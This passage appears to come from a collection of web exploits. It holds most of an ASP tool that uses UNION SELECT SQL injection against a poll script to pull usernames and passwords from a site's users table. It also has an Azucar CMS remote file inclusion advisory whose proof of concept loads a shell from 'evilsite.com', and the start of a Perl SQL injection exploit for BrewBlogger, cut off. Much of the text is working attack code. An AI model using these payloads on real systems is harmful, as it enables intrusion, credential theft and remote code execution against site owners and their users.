ID=1]</b></font></td> <td width="50%"><center> <form method="post" name="form1" action="exploit1.asp?islem=get"> <input type="text" name="text1" value="http://" size="25" style="backgroun d- color: #808080"><br><input type="text" name="id" value="1" size="25" styl e="background-color: #808080"> <input type="submit" value="Get"></center></td> </tr> </table> <div id=htmlAlani></div> <% islem = Request.QueryString("islem") If islem = "hata1" Then Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">Th ere is a problem! Please complete to the whole spaces</font>" End If If islem = "hata2" Then Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">Th ere is a problem! Please right character use</font>" End If If islem = "hata3" Then Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">Th ere is a problem! Add ""http://""</font>" End If %> <% If islem = "get" Then string1="default1.asp" string2="default1.asp" cek= Request.Form("id") targettext = Request.Form("text1") arama=InStr(1, targettext, "union" ,1) arama2=InStr(1, targettext, "http://" ,1) If targettext="" Then Response.Redirect("exploit1.asp?islem=hata1") Else If arama>0 then Response.Redirect("exploit1.asp?islem=hata2") Else If arama2=0 then Response.Redirect("exploit1.asp?islem=hata3") Else %> <% target1 = targettext+string1 target2 = targettext+string2 Public Function take(come) Set objtake = Server.CreateObject("Microsoft.XMLHTTP" ) With objtake .Open "POST" , come, FALSE .setRequestHeader "Content-Type", "application/x-www-form-urlencoded" .send "Voteit=1&Poll_ID=- 1%20union%20select%200,username,0,0,0,0,0,0,0%20from%20users%20wh ere%20user_id%20like%20"+cek take = .Responsetext End With SET objtake = Nothing End Function Public Function take1(come1) Set objtake1 = Server.CreateObject("Microsoft.XMLHTTP" ) With objtake1 .Open "POST" , come1, FALSE .setRequestHeader "Content-Type", "application/x-www-form-urlencoded" .send "Voteit=1&Poll_ID=- 1%20union%20select%200,password,0,0,0,0,0,0,0%20from%20users%20wh ere%20user_id%20like%20"+cek take1 = .Responsetext End With SET objtake1 = Nothing End Function get_username = take(target1) get_password = take1(target2) getdata=InStr(get_username,"Poll Question:</b> " ) username=Mid(get_username,getdata+24,14) passwd=Mid(get_password,getdata+24,14) %> <center> <font face="Verdana" size="2" color="#008000"> <u><b> ajann<br></b></u></font> <table border="1" cellpadding="0" cellspacing="0" style="border- collapse: collapse" width="35%" id="AutoNumber1" bordercolorlight="#808 080" bordercolordark="#008000" bordercolor="#808080"> <tr> <td width="50%" bgcolor="#808000" onmouseover="javascript:this.style. background='#808080';" onmouseout="javascript:this.style.background='#80 8000';"> &n bsp; <b><font size="2" face="Arial">User Name:</font></b></td> <td width="50%"> <b><font color="#C0C0C0" size="2" face="Ver dana"><%=username%></font></b></td> </tr> <tr> <td width="50%" bgcolor="#808000" onmouseover="javascript:this.style. background='#808080';" onmouseout="javascript:this.style.background='#80 8000';"> &n bsp; <b><font size="2" face="Arial"> User Password:</font></b></td> <td width="50%"> <b><font color="#C0C0C0" size="2" face="Ver dana"><%=passwd%></font></b></td> </tr> </table> <form method="POST" name="form2" action="#"> <input type="hidden" name="field1" size="20" value="<%=passwd%>"></p > </form> </center> <script language="JavaScript"> write() functionControl1() </script> </body> </html> <% End If End If End If End If Set objtake = Nothing %> Black_hat_cr(HCE) Azucar CMS <= 1.3 (admin/index_sitios.php) File Inclusion Vulnerability Code: + + Azucar CMS <= 1.3 (_VIEW) Remote File Include Vulnerability + + Affected Software .: Azucar CMS <= 1.3 + Download : http://downloads.sourceforge.net/azucarcms/azucarcms1.3.zip + Description : "Azucar is a modular content management system designed to be extremely user friendly" + Class : Remote File Inclusion + Risk : High (Remote File Execution) + Found By : nuffsaid <nuffsaid[at]newbslove.us> + + Details: + Azucar CMS admin/index_sitios.php uses the include function insecurely on the $_GET[_VIEW] + paramater passed to the script, a remote file can be specified and executed on the server. + + Vulnerable Code: + admin/index_sitios.php, line(s) 14-15: + -> 14-15: if (isset($_GET[_VIEW])) include($_GET[_VIEW]); + + Proof Of Concept: + http://[target]/[path]/admin/index_sitios.php?_VIEW=http://evilsite.com/shell.php + black_hat_cr(HCE) BrewBlogger 1.3.1 (printLog.php) Remote SQL Injection Vulnerability PHP Code: #!/usr/bin/perl ################################################################## ######################### #Target: # # BewBlogger 1.3.1 # http://brewblogger.zkdigital.com # #Vulnerability: # # SQL Injection # #Description: